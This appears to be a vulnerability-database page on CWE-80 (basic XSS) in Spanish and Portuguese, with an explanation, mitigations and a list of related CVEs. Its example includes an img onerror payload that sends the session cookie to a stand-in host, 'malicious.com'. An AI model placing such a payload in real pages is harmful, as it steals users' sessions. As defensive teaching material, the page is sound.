Fallos del tipo CWE-80

586 resultados

Falta de neutralização de tags HTML relacionadas a scripts (XSS básico)

Quando uma aplicação web recebe dados do usuário e os insere diretamente no HTML da página sem sanitização ou escapamento, um atacante consegue injetar tags e scripts maliciosos que executam no navegador de outros usuários. É um dos tipos mais comuns de XSS (Cross-Site Scripting) e permite roubo de sessão, credenciais ou redirecionamento para sites maliciosos.

Ejemplo

Um formulário de busca que mostra o termo pesquisado na página sem validação: se o usuário entra <script>alert('xss')</script>, o script executa. Ou um campo de comentário que exibe <img src=x onerror='fetch(malicious.com?cookie='+document.cookie+')'>, roubando o cookie da sessão.

Cómo mitigar

Sempre escapar/encodar saídas HTML (ex: converter < para &lt;, > para &gt;), usar Content Security Policy (CSP) nos headers HTTP, e validar/sanitizar entrada no servidor. Em JavaScript, prefira textContent no lugar de innerHTML quando possível; em frameworks, use templating seguro (React, Vue escapam por padrão).

CVE-2026-13225MEDIUMStored XSS in ticket confirmation pageEPSS 0.4%CVE-2023-25833MEDIUMBUG-000155004 HTML injection issue in Portal for ArcGIS.EPSS 0.4%CVE-2023-32193HIGHNorman API Cross-site Scripting VulnerabilityEPSS 0.4%CVE-2022-39372LOWStored Cross-Site Scripting (XSS) in user information in GLPIEPSS 0.4%CVE-2024-37166HIGHghtml Cross-Site Scripting (XSS) vulnerabilityEPSS 0.4%CVE-2025-57730MEDIUMIn JetBrains IntelliJ IDEA before 2025.2 hTML injection was possible via Remote Development featureEPSS 0.4%CVE-2024-32464MEDIUMActionText ContentAttachment can Contain Unsanitized HTMLEPSS 0.4%CVE-2024-52300CRITICALmacro-pdfviewer has a XSS through the width parameterEPSS 0.4%CVE-2024-8872MEDIUMStore Hours for WooCommerce <= 4.3.20 - Reflected Cross-Site ScriptingEPSS 0.4%CVE-2024-1606MEDIUMHTML injection in BMC Control-MEPSS 0.4%CVE-2026-73238MEDIUMApache Allura: XSS in code displayEPSS 0.4%CVE-2026-73237MEDIUMApache Allura: XSS in markdown pipelineEPSS 0.4%CVE-2023-40557MEDIUMWordPress Tabs & Accordion plugin <= 1.3.10 - Content Injection vulnerabilityEPSS 0.4%CVE-2023-39161MEDIUMWordPress Discussion Board plugin <= 2.4.8 - Content Injection vulnerabilityEPSS 0.4%CVE-2024-6108MEDIUMGenexis Tilgin Home Gateway Login cross site scriptingEPSS 0.4%CVE-2023-0007MEDIUMPAN-OS: Stored Cross-Site Scripting (XSS) Vulnerability in the Panorama Web InterfaceEPSS 0.4%CVE-2026-57534LOWStored XSS in pretix-pagesEPSS 0.4%CVE-2026-13314LOWStored XSS in pretix-digitalEPSS 0.4%CVE-2026-57532HIGHMalicious HTML content contained in the layout specification of a PDF ticket or badge layout was executed when the PDF editor is opened in EPSS 0.4%CVE-2024-24571MEDIUMfacileManager Systemic Cross-Site Scripting (XSS)EPSS 0.4%